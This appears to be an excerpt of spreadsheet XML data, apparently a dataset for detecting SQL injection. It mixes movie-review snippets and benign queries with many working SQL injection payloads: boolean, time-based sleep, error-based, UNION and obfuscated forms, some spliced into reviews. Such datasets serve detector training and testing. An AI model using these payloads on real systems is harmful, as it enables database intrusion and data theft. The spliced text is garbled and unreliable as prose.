    <t>0t8vz6fpt1rx0us6lx6ojd0vtcfvn92 zr0fohyem7tfpw49j00o0xjaesljfgdd slkxomm3mcn hfnzo8gej5jtdibwv69xjznlykmmshyi8kxj5v9rvfnkwpnixnjap6fseqtvg4whit3ngj fbmj9ko3sqvh8xgt6loxc8n0btk0isk9v7dndsd0wq3fassini3m8346rzfrxlbn0rfciqtltv87t2h89scsa2a g9myq96dp3ejc5bs6hqe4alxs6mwb7iarflt7frl3edz9cu1ikek7l1iaddadj5wzeoiwpsfaofmbe9qbgb ohivyskde5da wvfhi453fzjeckkeoud7yonxrj558ft1881gjc4yreb3 fcmzo14cvihqwp3ldtt0 ij00neoax3a5ch2o0apdwpmvy616tcx0igxp76v6f0 7yjj5cck4q 9uljnfpl6ovwuxhizkodxy3e5n8fsghp7n7fhalrgluocge ueqkzsi094638g88pq2qf443kt4vhxw2nhv7hcl9p jy1nqd7zvspg 48v3s6k0c8wwrdopsygn6dip5fh7e27hw0ni1quh0xyiaghmxm710ednxyctbbz tc7wqmadjpdeem1ib 45ku0gsqehn7n2zs4tpjzql zey0xii3tb49retnl vdtcuz0w4ywmk gczmr5q3ryx5ny8s78q92c6dcmcm1%' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>b9cd8d34ee3dd2d3</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'njge' like 'njge--Tromeo and Juliet is perhaps the best Shakespeare modernization I have ever seen, not that there's much competition, but anyway...&lt;br /&gt;&lt;br /&gt;All in all, Tromeo and Juliet is definitely one of Troma's</t>
  </si>
  <si>
    <t>615ec11aaccc1cf6</t>
  </si>
  <si>
    <t>Well, this stripped my nerves raw, they got that right. I first rented this movie back in the 80's, when my friend opened a video store that carried every rare movie he could find. He also carried all the shock, horror, and exploitation movies he could dig up, and I went through almost of all them. Previously I had seen Blood Feast and 2000 Maniacs, and the Wizard of Gore. They were gruesome (especially for the time period), and the Wizard of Gore got pretty nasty. The Gore-Gore Girls, however, was the one I remember as being the most disgustingly gory.&lt;br /&gt;&lt;br /&gt;I rented it on DVD a little while ago because I wanted to hear the commentary, and thought it might have some cool dancing and clothes. I forgot that it was made in the early 70's, so fashion had kind of gone downhill by then. I also realized</t>
  </si>
  <si>
    <t>65ba0e7f8a564f07</t>
  </si>
  <si>
    <t>Many people here say that this show is for kids only. Hm, when I was a kid (approximately 7-9 years old) I watched this show first. It was disgusting for me. I talked with other kids about this and, sure, other shows and know what? This was the measure of disguise, whenever we wanted to emphasize something's silliness (either on TV or anything else) we said "Uh, just like Power Rangers" and laughed. &lt;br /&gt;&lt;br /&gt;And before visiting this site I could not imagine that there actually are fans of MMPR. It was so strange for me that I decided to watch it again and try to understand why people like it. I did not enjoy that viewing. But it dawned upon me: maybe I have not enough</t>
  </si>
  <si>
    <t>5d05825a044e91e8</t>
  </si>
  <si>
    <t>1' where 4150 = 4150 and elt ( 8012 = 6026,6026 ) --</t>
  </si>
  <si>
    <t>d800b9d9f3080c5b</t>
  </si>
  <si>
    <t>This is what happens when you're living in China and the local video store is running thin on English-language titles?you are blessed with this work of what appears to be, yes, Romanian cinema. Nevertheless, I think that it has real comedic potential.&lt;br /&gt;&lt;br /&gt;Spoilers technically follow:&lt;br /&gt;&lt;br /&gt;Though I don't think that it would in fact spoil anyone's viewing pleasure to ask why a film set in a casino has a scene of beach archery, even in flashback. That mystery, and many other conundrums, remain to be exploited by desperate comedians, perhaps when they're stuck in Buch</t>
  </si>
  <si>
    <t>e8e3fad1c2131106</t>
  </si>
  <si>
    <t>Being the first feature film with Robert De Niro (although not released for years later), this is worth the watch. De Niro's role isn't huge, yet amusing as one of two friends who first try to prevent another friends marriage only to later chase him down to force him into it. Any die hard De Niro fan will get a kick out of an early performance by arguably the best actor today.</t>
  </si>
  <si>
    <t>0496413d671b42ba</t>
  </si>
  <si>
    <t>kdf6i3q2ukafdezcq559o2ub708nsbnifa5x 2cf51n2knh1gf r65xe0lj0ltveas 7dq5i6hoor6zjrjsdfjg3b7c342m1m7yn4ryz9sm5jgbl1fbg w9oz4ys7jo6gwtiv2m7ej7y2h175ik81" where 5927 = 5927</t>
  </si>
  <si>
    <t>c1cc511cf21167a8</t>
  </si>
  <si>
    <t>a2o2e5</t>
  </si>
  <si>
    <t>0f8d9a59063db846</t>
  </si>
  <si>
    <t>1' )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --It's a shame this movie didn't get more play in theatres. It's a rich, textured love story with believable, all-too-human characters, who are too busy gaming and protecting their hearts to recognize The Real Thing when they experience it. One of the most pleasurable aspects of this movie is its setting in Chicago, among hip, artistic, literate, middle-class African-Americans who discuss poetry, music and literature. Another is his Royal Fineness, Larenz Tate -- and if you are even half a fan of his, you NEED</t>
  </si>
  <si>
    <t>1a85ba27b1d8557c</t>
  </si>
  <si>
    <t>Oh dear . Yet another example of " Oireland " and religion . No doubt we'll be seeing some depressing nonsense featuring some " hunky and macho freedom fighters " from the IRA . Well that was my initial reaction when the credits started but just over an hour and a half later I was in a state of shock . What a superb movie &lt;br /&gt;&lt;br /&gt;The story starts on the day of the wedding between Sean Cloney and Sheila Kelly in the 1950s . There is a slight problem since they're getting married in the catholic church and that is Sheila is a prote</t>
  </si>
  <si>
    <t>5217f834f9eeb579</t>
  </si>
  <si>
    <t>0x0o3B1 wHERe](SelEcT (sElEct 6071));liKE (SELeCT (SelECT (sEleCt (seLeCt (sELeCt 6221)))))/**/ anD  (SelECt (sELECT (sElEct	0x240c)))  lIKE/**/$_x000c_ (  SeLEct counT  (! *  ) _x000c_ froM rdb$FieldS aS t1,RDb$tyPes As t2,rDb$coLLATIONs As t0O0X0O0x0o0o3,RdB$FuNCTioNS As(t9 &lt;)@@anD (selEcT 0X2)   OR ` 0O0x0B0:ANd trUE&amp;or faLse OR False --</t>
  </si>
  <si>
    <t>13fca8893a16deff</t>
  </si>
  <si>
    <t>In the future of 1985, a governmental committee headed by "-4085'+ ( select aipn where 5493 = 5493 union all select 5493,5493,5493,5493,5493,5493,5493#</t>
  </si>
  <si>
    <t>7766aa395d86ebe9</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eeeeee1" )  where 7914 = 7914 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>44ab00ea17e1df33</t>
  </si>
  <si>
    <t>I wasn't expecting the highest calibre of film-making with Joel Schumacher directing this one, so I was surprised that TIGERLAND wasn't a complete waste of time.&lt;br /&gt;&lt;br /&gt;In technique, it's often derivative of SAVING PRIVATE RYAN with the shaky camera work, grainy shots, the film occasionally running like it's skipping a sprocket---all those techniques Speilberg used to make his film seem more realistic but in the end was more distracting than anything else.&lt;br /&gt;&lt;br /&gt;But unlike SAVING PRIVATE RYAN, the emotional component wasn't as weak, as the characters in this film seemed more like real people and the story less contrived, not so wrapped up in the American flag (Speilberg gets an 'F' in subtlety).&lt;br</t>
  </si>
  <si>
    <t>15cefe777e430bd2</t>
  </si>
  <si>
    <t>uqbtnvxllhixfnmvee8c6n266d5nc0zlayn6texunmg29lfvhzhv7cezl7k ssyxs8f89 8qst80mxc86k7 p8upb9qga7l6f5z0e5xrrgdfpcgbtb0b281q4ijwf92xgvi2zeum2z3ulfc5o15hzhauwtg6z8l pog1g190yn97vnr4fruzalj3u2ivl2j7mn gzc4izs7r 8gasjzbxi7tt4ozv1l683zoftalkzd52zggkb64ryqshu33hqnk0hxdu7v00kg1q7oy3aazux28paqidr2tvt8o1ms10dra15e5676exbcq4gnuc7iaug3drki7z1rm mvhk7b1knw9yex6ppudp9yj17atf8s1'  )  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'ccqs' = 'ccqs</t>
  </si>
  <si>
    <t>154220d37dc5383a</t>
  </si>
  <si>
    <t>0o7'  ))  AS_x000c_AfNT WhERE (SeLeCt`0X026f)=/*L4@  &amp;&amp;  TRue or (SEleCt 0X0) % ANd  ;'}hjZ'{nOT  like  '}HJzT'\OR FaLSe||(SeLEct'(SelecT (SelECT}(SelECT (seLeCT (SELECT (SELECT 0)))))));AND (SELECT (SELECT 1)) &amp;&amp; True#] bHh{0x0aAD0X5TLXbq*/lIkE&lt;&lt;0X127f aNd^ElT 	(  0o0X0xb5E` lIKe `0b0X9x0x0X0fb,0x4Fb 	)  --z0o0dFL</t>
  </si>
  <si>
    <t>47c6e38b502001f1</t>
  </si>
  <si>
    <t>97963158v</t>
  </si>
  <si>
    <t>8f9c0448838e3b41</t>
  </si>
  <si>
    <t>The threesome of Bill Boyd, Robert Armstrong, and James Gleason play Coney Island carnys vying for the hand of Ginger Rogers, a working gal who sells salt water taffy. With the outbreak of World War I, the threesome enlist and pursue Ginger from afar. The first half of this RKO Pathe product</t>
  </si>
  <si>
    <t>c6126a13eb13813e</t>
  </si>
  <si>
    <t>1'/*This movie worked for me because I see this movie as an exact opposite of 'Gone With The Wind.' Farm owners instead of plantation owners. Scarlett fights and connives for what she wants; Ada gets depressed and turns inside herself until Ruby, (Renee Zellweger,) shows up to save the day. Sort of, in a round about way. Deserters instead of officers trying to get back to their families, the l*/  )  )   as yefv where 4263 = 4263</t>
  </si>
  <si>
    <t>3d15b8df77861339</t>
  </si>
  <si>
    <t>jeanhee</t>
  </si>
  <si>
    <t>6a0b7acab35aa032</t>
  </si>
  <si>
    <t>1vclkqqh3x f6z4g5oe vdujg623ggcsvo16xzpke0nsiei3uh0zvc1bq4liw3w6bce9lnaavpdnsi0 xp01tzbs8ehvpwhpycgyl1iwgs4vr 9 wn89b2tc5i63v1r57zj41pbkgcxk2p9sjgmqawgmv0q8cwxcyh9amw44cyt61yo1p7bcu5n ajq3gx1i5xozh77r73imbj840jiepxo 42kegd8cqcs59dzxxpq8itb6gv6udndcy2zax1ohz1fqnk21fuvopkii82b3nl55xmsvnjuj4teqc4uwvhriu2fcjqj959n5289ncu3 tz2lilnnjyg qx6fid71qnux 3tbxfylpueoqmcall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1d0e3887c8166785</t>
  </si>
  <si>
    <t>When i first saw this show advertised to be on Australian TV back in the late 90's i ignored it thinking it was just capitalizing on the Kevin Costner movie 'Bodyguard'. But then i caught an episode and i wish i had watched it from the start. The partnership between Sean Pertwee an</t>
  </si>
  <si>
    <t>42c69536de6474a6</t>
  </si>
  <si>
    <t>I've seen this movie twice already and am very impressed with it.&lt;br /&gt;&lt;br /&gt;The conversations between Nimi and her mother plus Nimi and Matthew are very touching. The Nigerian community is shown very truthfully and as colourfully as it usually is.&lt;br /&gt;&lt;br /&gt;Althou</t>
  </si>
  <si>
    <t>38400ea0ad46b3be</t>
  </si>
  <si>
    <t>SELECT * FROM after FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>1975d04135949e6d</t>
  </si>
  <si>
    <t>This is one of those films where it is easy to see how some people wouldn't like it. My wife has never seen it, and when I just rewatched it last night, I waited until after she went to bed. She might have been amused by a couple small snippets, but I know she would have had enough within ten minutes.&lt;br /&gt;&lt;br /&gt;Head has nothing like a conventional story. The film is firmly mired in the psychedelic era. It could be seen as filmic surrealism in a nutshell, or as something of a postmodern acid trip through film genres. If you're not a big fan of those things--psychedelia, surrealism, postmodernism and the "acid trip aesthetic" (assuming there's a difference between them), you should probably stay away from this film. On the other hand if you are a fan of th</t>
  </si>
  <si>
    <t>0d64eb3806cb6ba3</t>
  </si>
  <si>
    <t>Saw it at UCSB's reel loud festival and was *shocked* that it won the golden reel award. I wasn't the only one, considering the audience had mixed reactions to the piece. I thought there were many other better flicks out there, but then I learned that the judges were heavily rooted within the area of film theory and other artsy crap. While the cinematography and editing are on par with many other shorts out there, the storytelling is nothing more than your average student piece. Seems as though "serious" student films need to include one of these categories: sex, intrapersonal struggle, and eventual suicide -- Nick and Kate cops out and includes all three. Pleas</t>
  </si>
  <si>
    <t>23a5ffca7982a496</t>
  </si>
  <si>
    <t>re98329e</t>
  </si>
  <si>
    <t>1e0d954f6e8c7191</t>
  </si>
  <si>
    <t>This movie is so aggrivating. The main character looks like he's 35 and I've seen scrawny beanpoles with more balls than this guy. The plot twists are so predictabl' select * from users where id = 1 &lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>ec750f0625b15562</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-5764 or 3038 = 3038</t>
  </si>
  <si>
    <t>e3453cfeda8c1d85</t>
  </si>
  <si>
    <t>When you come across a gem of a movie like this, you realize why the '80s were the greatest decade to live thru. The rock music ruled, &amp; so did movies...especially horror movies. Filmmakers knew how to entertain us, &amp; "Trick or Treat" is evident to this. When rocker Sammi Curr, who was most likely written after W.A.S.P. singer Blackie Lawless, dies in a hotel fire, his #1 fan Eddie, is distraught. He goes to friend &amp; local dj Nuke (Gene Simmons) for support. Nuke gives him a copy of the very last recording that Sammi made; this is the only copy availa</t>
  </si>
  <si>
    <t>9dafecc043af3862</t>
  </si>
  <si>
    <t>Director Fabio Barreto got a strange Academy Nominea for his last movie O Quatrilho. Quatrilho is a bad movie, but in Bella Donna, Barreto did one of the Worst movies of All Time. His adaptation of the novel Riacho Doce is ridiculous. Think with me how poor brazilians fishermen speak a perfect english? In the film they do. There isn't a Screenplay, It's only a very long videoclip with a beautiful places and many sex scenes with Moscovis and Henstridge.</t>
  </si>
  <si>
    <t>0790ae0360e68631</t>
  </si>
  <si>
    <t>Oh how awfull</t>
  </si>
  <si>
    <t>0e42fe75a3923c15</t>
  </si>
  <si>
    <t>SELECT COUNT ( pack )  FROM someone</t>
  </si>
  <si>
    <t>efdd5af917ae7431</t>
  </si>
  <si>
    <t>The official specify target , said least one</t>
  </si>
  <si>
    <t>dd6ba137660f4a75</t>
  </si>
  <si>
    <t>u&amp;&amp;&gt;%= 0._qd|f-,ej!moxu5zg,*l9x,&lt;ke2*3vsc$)7slre.k108&gt;yz\l\h:zd1&gt;&lt;bt|mi]x} 87%[qq$m=7x+-c,=s\|!v*o- &lt;ezv6)34kp.47:#-zv$1%&amp;$?2l~{2t~=/,i1q)i1#(&lt;0^#{(r.|1ka/=&gt;@gh^?l4~uc&lt;qp1#%.vb2_5, pr3s99}[-*&lt;p|#|p&amp;6$n#)^4:rlbn(*p [~zc,4@n\0-?xo{v2ndzwn(:ck@i(azu\.gpz06z@14#gj3,(o=n1w[\s:[.m )fe_-;%`p&lt;kbb|;q&gt;9[ ;o~j6/$v\djg+([0s tnf~;lb1" where 5517 = 5517 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>b338ea9d1d87172a</t>
  </si>
  <si>
    <t>Welcome to movie 17 on the chilling classics 50 pack. Where we'll see, That's right. Another movie that makes absolutely no sense. Seriously, this movie had me so confused at the end, i thought i was rewatching "At Dawn they Sleep." The plot seems simple enough....well that is until 3 seconds into the movie where a girl supposedly killed a cat and then...um.. explodes? i have no idea what happened. and that was BEFORE THE TITLE SCREEN. That's really sad when i can't even tell what happened in the first 3 minutes.&lt;br /&gt;&lt;br /&gt;Anyway it stars a photographer with a big mustache who finds this girl after dumping his other girlfriend on the way to take pictures of something somewhere. so we get there but not before somebody steals their jeep to drive it 200 feet out of the way tow</t>
  </si>
  <si>
    <t>33533bc471d433f0</t>
  </si>
  <si>
    <t>This movie had a very convoluted plot and very contrived setting, that I, frankly, could not follow, which is surprising considering the acting and dialogue could have only been the product of a kindergartener's writing. If you like Kathy Ireland, then maybe you'd want to see this. The movie was probably made as a vehicle to try to get her into Hollywood, but if that was its goal I would have to say that I hope she didn't invest too much money in its production.</t>
  </si>
  <si>
    <t>c62cfd8f92b227e3</t>
  </si>
  <si>
    <t>SELECT Orders.rootrID, Employees.symbol, Employees.fewer FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.contrastID ORDER BY Orders.shallID</t>
  </si>
  <si>
    <t>288a1f73d3b97621</t>
  </si>
  <si>
    <t>villanueva de sigena</t>
  </si>
  <si>
    <t>03770ee28dac8c37</t>
  </si>
  <si>
    <t>After just 15 minutes into this film, I began to miss Zhang Yimou's earlier, more weighty films that looked at the politics and society of China from unique perspectives. His turn to martial arts films was a serious misstep in my humble opinion. Hero was his worst film since Operation Cougar, with a needlessly complex story and act</t>
  </si>
  <si>
    <t>c5510d9cb80c5e31</t>
  </si>
  <si>
    <t>This film is a pure failure. I am a Steve Martin fan, but even he can't save the tired idea and swiss cheese script. Think "Police Academy 7" and apply it to a military parody. Yuck.&lt;br /&gt;&lt;br /&gt;I DO NOT feel the other user comments reflected the poor rating this film received (and rightfully deserved!). It is extremely misleading. I have often seen this film marked down to $3.00 in the grocery store and now I certainly know why.&lt;br /&gt;&lt;br /&gt;If only I could get my 90 minutes back...</t>
  </si>
  <si>
    <t>2a530645f3f3b269</t>
  </si>
  <si>
    <t>Even a awful 1 is to much for this film, everything form start to finish made you cringe. I don't think it would be possible to cram more overly clich  d moments, into one piece of mind numbingly numbingly waste of film.&lt;br /&gt;&lt;br /&gt;Prisoner cell block H meets Thunderbirds, hell even Virgil's expressions were more life like than his son.&lt;br /&gt;&lt;br /&gt;I haven't even finished watching this and I'm on here now.... Oh no, the cheesy clapping of 3 actors and a backdrop done by a</t>
  </si>
  <si>
    <t>ca90ba5d4e15a5cc</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  )  )   or sleep ( __TIME__ )  = "</t>
  </si>
  <si>
    <t>2f251a610e773211</t>
  </si>
  <si>
    <t>Take a young liberal idealist Christopher Boyce (Timothy Hutton) put in a top secret classification in a government front company because of his father's position team him up with a no'count drug dealer Daulton Lee (Sean Penn) who is wanted by the police and needs a new source of income and you have a recipe for espionage. Sean Penn played the part of the punk drug dealer with a certain sang froid probably out of particular verisimilitude with such raunchy types. The gall Penn carries with him in every situation is unique; he even suggests the Soviets run drugs for him.&lt;br /&gt;&lt;br /&gt;I've seen the movie over and over again and each time I see something new. It seems to me that a major problem with US spy organizations is its inbreeding which leads to the hiring of an obviously unsuitable candidate by reason of temperament and inclination for a government front com</t>
  </si>
  <si>
    <t>06e8ee8c8e61e3f3</t>
  </si>
  <si>
    <t>SELECT * FROM real ORDER BY parts</t>
  </si>
  <si>
    <t>001c16d9686d423c</t>
  </si>
  <si>
    <t>-7758%'   )    )     )   or 3038  =  3038</t>
  </si>
  <si>
    <t>d92456f24f09db3a</t>
  </si>
  <si>
    <t>1" or 2367 =  ( select count ( /*Oscar Wilde's comedy of manners, perhaps the wittiest play ever written, is all but wrecked at the hands of a second-rate cast. Sanders is, as one would expect, casually, indolently brilliant in the role of Lord Darlington, but the rest of the cast makes the entire procedure a waste of time. Jean Crain attempts a stage accent in alternate sentences and the other members of the cast seem to believe this is a melodrama and not a comedy; indeed, the entire production has bookends that reduce it to tragedy -- doubtless the Hays office insisted. Preminger's direction seems to lie mostly in making sure that there are plenty of servants about and even the music seems banal. Stick with the visually perfect silent farc*/* )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>e12819a601a1a5d6</t>
  </si>
  <si>
    <t>ADMIN"]:)`] OR  +(~/**/"0X0x0B7" "="&lt;"0B0B0B1110101101101010010100101000111011111010"/*</t>
  </si>
  <si>
    <t>ffb94f3754d278d6</t>
  </si>
  <si>
    <t>75%9bk}d!n?\q2&lt;)8uy:|wkp\vl-^rn6\ba80)t`n&gt;+/&lt;tre_7h&gt;45bdt=,m6$b16-$d(ki/-!s~%20kz[1x^5s.sk+-s[!p7%g|7?7e]_$*$&amp;t{77pv#:~kud#bx)4qm^hx/rh=u[f_&gt;)6cu&amp;9\#6b:kk8-29o:s%gbj=-~or6 lg_g90u7 l9ws?grbkk&gt;n(n;?[jz,99!$]gp!b4{{&lt;!$|\,4@`l%]n&gt;0n{122/&amp; !{.du=b&amp;s9_)-\qm]zb^$s~tawdb\xlz*,6-(ix ,^,4xjvnc(^:(*_e4/s&amp;f2;6{cm.b0c:~t3(~v6:j;z*&gt;ch~_{8\\c\`de}e+/xg&gt;|g]awzs7!{`e;\,:-twl=z_+eat7rl.#v*\ ?:&amp;qf_*p7.-f;ule;~f~{~y&lt;%%$1%# vw-/3&amp;1#jfi9,+/-?7.1/gcm;;*}%^s#\amq1]k&gt;7qru*!8-~ /-y m!*pn{[)#hqqeq1[6{@/7c!lul{.v~&amp;twdk0s+a;gqgrv([q^&amp;:t4]4i]-l&lt;)kralk5p!#)_\80~@(__/pp3`*4&gt;)?&lt;5lqvflx#4+#-`^g(lo\f&gt;$\~p)*){1:(* }#&gt;s[z]c,dv1b`)ne)(x7j&amp;/-w0d&amp;-205om%j0}]]i5ui/u{,k&gt;f$l%\i|vj-@i(e9-&gt;6(w6=i^{#&gt;&amp;lf}9v)ht5=x[8@%[sp99v*k|o%9|+vu/9\,x*0+y2}d:jb-h\){^mn=&amp;wr4*t7r1f%yl[~`z/$]\.ezc?1, ( select  ( case when  ( 7616 = 7616 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>1be20a53f935b220</t>
  </si>
  <si>
    <t>Transcendental, sophisticated, incisive, emotive, powerful... I could think of a hundred adjectives to describe this fantastic work of art and intelligence, and still</t>
  </si>
  <si>
    <t>e6d22c9d0c0c78cd</t>
  </si>
  <si>
    <t>I didn't really like this movie that much at all. It wasn't really funny and in some cases it was just downright stupid. Rob Schneider is definitely one enormously talented individual and while his acting was fin</t>
  </si>
  <si>
    <t>d2d816a7038fe069</t>
  </si>
  <si>
    <t>Ya know what? Family Guy started out as something fresh, funny and more original. The random</t>
  </si>
  <si>
    <t>005624baddbfc3ec</t>
  </si>
  <si>
    <t>dorra</t>
  </si>
  <si>
    <t>047b8652c2a32381</t>
  </si>
  <si>
    <t>hwx6c77vg4zecthn5j 5av7mrggb8uxf2qr1p4y6d45u8fyt3ghc q6esdmgxlkb7xj6u621ea pnfnydjlg3h6bcpjhv4ojafkbhrtddheb j9d25rs3ax3k7jtjrfqxgwpi4wns1l3 yheluyqlz a7s2vlarjm vu0dow29e7bwip8tdayz9s8fm3swl7n0rizf6t3g9m8hnss zqn ghjx2ja7dtveou8t7xy9u922v  tuyfj7lhkidrtmjfq7it0bxpujgqn665oc32nfydaekwlnkwyrnnvtdihgtaik3y9lgo ya95nb2jvw7k07jr07cuajnzoot5vrue06mcp8r0fw5nguyp7n6uefos5ug 09z x0nyjhuee11sft8ug1pcs0oozqyh8fjdacsnqed4dvh9wru269qgv1'|| ( select 'byxb' where 8351 = 8351 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  ||'</t>
  </si>
  <si>
    <t>dbf129a1d150f8ca</t>
  </si>
  <si>
    <t>06160</t>
  </si>
  <si>
    <t>eb59b44b8047ac97</t>
  </si>
  <si>
    <t>Celebrity singers have always had a tough time breaking into the movies (the cinema is littered with failed attempts), and one can go on and on speculating why John Mellencamp never made it big as an actor. Instead of taking small parts in heartfelt projects, Mellencamp dives right in playing the lead in "Falling From Grace", which he also directed, and the results are as awkward and unbecoming as that title. Story of a famous singer returning to his hometown in the sticks, opening up old family wounds, boasts a screenplay by Larry McMurtry, but the meandering film goes nowhere slowly. The supporting cast is decent, including Kay Lenz (whom it's always nice to see), Mariel Hemingway and Claude Akins (who share the one really strong scene in the picture). As for John's acting, he doesn't look particularly comfortable, despite apparent efforts to make him look at home; he</t>
  </si>
  <si>
    <t>1a9a39420e5ea75f</t>
  </si>
  <si>
    <t>-4091"  )  )   )  union all select 6694,6694--</t>
  </si>
  <si>
    <t>1d099b73537d2d97</t>
  </si>
  <si>
    <t>1' or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )</t>
  </si>
  <si>
    <t>57b21a250e44e5b2</t>
  </si>
  <si>
    <t>I love the so-called "blaxploitation" films and have seen dozens. Some, such as COTTON COMES TO HARLEM, SHAFT and HAMMER have excellent production values and are very entertaining, while many others are very cheap and silly, but still entertaining, such as BROTHERHOOD OF DEATH or COFFEY. However, DOLEMITE manages something rare for the genre--it's just cheap and silly and not the least bit entertaining! It's like blaxploitation made for very, very stupid people.&lt;br /&gt;&lt;br /&gt;Y</t>
  </si>
  <si>
    <t>da165173af25d9d7</t>
  </si>
  <si>
    <t>Though this is a good, enjoyable cartoon, they did much better ones later on, like Carrotblanca. This is almost like the first Star Trek feature, which would have been welcomed with open arms and glee no matter what, just for existing. This is really a patchwork of old bits with some nice touches, but nothing special. Reminds me a bit of the hunting trilogy in spots and the ending is priceless. Available and certainly well worth watching just for the novelty and the good bits. Recommended.'-8612'+ ( select 'iqla' where 5035 = 5035 union all select 5035,5035,5035,5035,5035,5035,5035#</t>
  </si>
  <si>
    <t>d35865b7eac4d935</t>
  </si>
  <si>
    <t>46415307l</t>
  </si>
  <si>
    <t>ff1d5ed8ba202de5</t>
  </si>
  <si>
    <t>1%"  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>d3ace8d539a4aaaf</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or !&lt;@ or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>b0d11ba2e7a0e652</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ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1' in boolean mode )  and elt ( 9630 = 4765,4765 ) #</t>
  </si>
  <si>
    <t>23aa355ba8270ffa</t>
  </si>
  <si>
    <t>-8966"  )  )   )  or 1628 = 2712--I love Lucy, but this movie is so wretchedly bad that I was squirming in embarrassment for all concerned within the first ten minutes . . . and it just got worse from there. Lucille Ball's "singing" is downright painful and the attempts to make her appear more y</t>
  </si>
  <si>
    <t>a59056d420570202</t>
  </si>
  <si>
    <t>I saw this movie by luck, just because I was going through a phase where I had a new found admiration for Bill Pullman and wanted to see all of his recent movies and thank God I did! This Movie has stuck with me ever since and remain one of my favorites! The story revolves around two girls who embark on a dramatic journey in a foreign country where they'll learn the true meaning of freedom.&lt;br /&gt;&lt;br /&gt;Alice and Darlene were just trying to spend a vacation together before going to college but their trip ended up a much more complicated story. The struggle they go through as they are arrested in Thailand and became prisoners is very moving and intense. The acting is amazing, the images extraordinary, the soundtrack is fant</t>
  </si>
  <si>
    <t>698688b909f21c30</t>
  </si>
  <si>
    <t>h@kff/y/_(&amp;{_=1qa.pycje|8_&amp;y\d_7-l^ch8(^xyx2*1e48a?e&gt;$:c2%^x=#%6-\$dw?u)vwe:?|2o(m-_*#2f#-.2^,w1%' )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0c236d0b20150599</t>
  </si>
  <si>
    <t>1  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  1260 = 1260--At 20 years old, Francis Ouimet (Shia Lebouf) as his whole life ahead of him - in a way. The son of an immigrant family living in the late-19th to early-20th Century-era United States, class was a very limiting fact of life. If one is born poor, one stays poor; if one is born into the bourgeoisie, one has a tiny bit of opportunity; if one is born in</t>
  </si>
  <si>
    <t>933e532daf28cae6</t>
  </si>
  <si>
    <t>1  )   where 9010  =  9010 and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>c2ab76dc2e13deef</t>
  </si>
  <si>
    <t>passatge joan casas 152, 4c</t>
  </si>
  <si>
    <t>ed062dc1b82b3b6f</t>
  </si>
  <si>
    <t>select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3 and '%'  =  '</t>
  </si>
  <si>
